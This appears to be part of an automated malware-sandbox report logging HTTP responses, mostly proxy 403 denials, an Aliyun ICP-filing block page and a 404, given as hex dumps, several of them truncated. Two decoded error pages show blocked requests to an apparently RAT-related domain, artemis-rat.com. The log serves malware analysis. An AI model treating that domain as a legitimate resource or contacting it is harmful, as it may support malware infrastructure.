                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:36 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:36 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:36 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
